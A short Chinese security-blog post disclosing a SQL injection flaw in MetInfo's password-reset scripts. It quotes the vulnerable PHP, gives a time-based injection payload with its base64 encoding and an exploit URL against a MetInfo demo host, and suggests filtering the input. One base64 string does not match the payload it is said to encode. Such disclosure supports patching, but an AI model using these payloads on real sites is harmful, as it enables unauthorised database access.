- A+
所属分类:Seay信息安全博客
显示不全请点击全屏阅读
漏洞发生在member/getpassword.php与admin/admin/getpassword.php文件中
if($p){ $array = explode('.',base64_decode($p)); $sql="SELECT * FROM $met_admin_table WHERE admin_id='".$array[0]."'"; $sqlarray = $db->get_one($sql);
base64_decode($p)后的值用explode分割然后提交给 $array数组,最终$array[0]进入SQL查询,注入发生。
漏洞证明:
1’or(select sleep(5))#.1将之base64编码MSdvcihzZWxlY3Qgc2xlZXAoMTApKSMuMQ==
然后EXP
http://demo.metinfo.cn/member/getpassword.php?lang=cn&p=MSdvcihzZWxlY3Qgc2xlZXAoNSkpIy4x
修复方案:
过滤$array[0]
Tags:
如果您喜欢我的博客,欢迎点击图片定订阅到邮箱 也可以点击链接【订阅到鲜果】
如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡